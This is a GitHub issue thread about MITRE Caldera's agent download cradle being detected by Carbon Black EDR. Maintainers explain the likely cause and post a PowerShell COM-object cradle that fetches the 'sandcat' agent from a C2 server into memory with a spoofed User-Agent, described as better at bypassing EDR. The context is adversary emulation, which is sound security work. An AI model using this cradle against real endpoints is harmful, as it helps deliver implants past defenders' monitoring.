### ISSUE TITLE
Caldera cradle and PE execution is easily detected by carbon black 

### ISSUE THREAD

**Issue by royharoush** [mitre/caldera#1334]
Hi, 
I've upgraded to the latest caledera version and it seems like this version's cradle and execution is blocked by carbonblack. 
version 2.5.0 and lower had no issues running and establishing a beacon. 
has something changed ?

**Comment by khyberspache** [comment]
We have changed it slightly, and it is probably flagging as malicious because we are storing large amounts of data in memory before writing to disk.  Try one of the other download cradles from pre-2.5.0 and see they work with current Caldera.

**Comment by privateducky** [comment]
Today, i added the ability for us to show/handle multiple variations of each delivery command. I included our "old" command as the base one. See image for details. This is in the bleeding-edge code and will be part of our future releases.

![Screen Shot 2020-03-04 at 5 59 41 PM](https://user-images.githubusercontent.com/49954156/75931049-01d7e500-5e42-11ea-8e21-b16159814b50.png)

**Comment by khyberspache** [comment]
@royharoush meant to provide this code sample.  While more verbose, using COM objects seems to work better for bypassing EDR.  This code will get you the byte stream in memory so you can do whatever you want with it:

```Powershell
$server = "http://localhost:8888";
$endpoint = "/file/download";
$web=New-Object -ComObject MSXML2.ServerXMLHTTP;
$web.setOption(2,13056);
$web.open("POST", "$server$endpoint", $false);
$web.setRequestHeader("file","sandcat.go");
$web.setRequestHeader("platform","windows");
$web.setRequestHeader("server",$server);
$web.setRequestHeader("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36");
$web.Send();
$pbytes = $web.ResponseStream();
```
